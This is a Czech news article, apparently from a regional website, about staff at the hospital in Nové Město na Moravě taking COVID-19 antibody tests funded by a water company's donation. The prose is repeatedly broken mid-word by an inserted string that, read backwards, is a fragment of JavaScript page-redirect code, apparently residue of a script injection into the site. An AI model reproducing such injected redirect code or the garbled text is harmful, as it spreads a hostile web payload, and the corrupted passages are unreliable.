Rainbow page separator

Zdravotníci zjišťují, zda mají protilátky proti koronaviru

Pondělí, 30. listopadu 2020

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Test, díky kterému zjistí, jak jsou na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom s protilátkami proti viru SARS-Cov-2 způsobujícímu onemocnění COVID-19, mohou pods[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupit zaměstnanci novoměstské nemocnice. Dozví se, zda jejich organismus přišel v minulosti do kontaktu s virem SARS-CoV-2. Náklady spojené s tes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továním zaměstnanců nemocnice uhradí ze sponzorského daru ve výši 100 tisíc korun, který poskytla žďárská divize Vodárenské akciové společnosti (VAS). „Nabídka je opravdu velkorysá a přišla ve chvíli, kdy jsme našim zaměstnancům testy na určení protilátek proti viru chtěli nabídnout. Jsme moc rádi, že můžeme sponzorský dar od Vodárenské akciové společnosti na ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to testy použít,“ uvedla ředitelka nemocnice Věra Palečková.

Nápad využít dar právě pro tes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování zaměstnanců na protilátky proti koronaviru se líbil i dárcům. „Zdravotníci jsou v první linii a jejich pomoc může potřebovat každý z nás. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to je logické, že pokud jim testy mohou zajistit potřebnou psychickou pohodu, je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to krok správným směrem,“ sdělil ředitel VAS ve Žďáře nad Sázavou Karel Fuchs.

O dobrovolné testy je mezi zaměstnanci, kterých je zhruba tisícovka a od začátku druhé vlny jich onemocněly dvě s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky, zájem. „Testujeme druhý týden, denně vyšetříme okolo osmdesáti lidí. Dá se předpokládat, že o test projeví zájem zhruba 70 až 80 procent našich zaměstnanců, možná víc. Od kolegů, kteří už test pods[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupili a znají výsledky, mám informaci, že jim test dal jakýsi vnitřní klid. Jsou rádi, že se mohli dozvědět, zda nemoc prodělali, či nikoli. Onemocnění COVID-19 může [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž probíhat bez jakýchkoli příznaků, nebo jen s mírnými, které člověk nemusí považovat za významné,“ přiblížila mluvčí nemocnice Tamara Pecková. V průběhu prosince hodlá novoměstská nemocnice ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to test nabídnout i samoplátcům.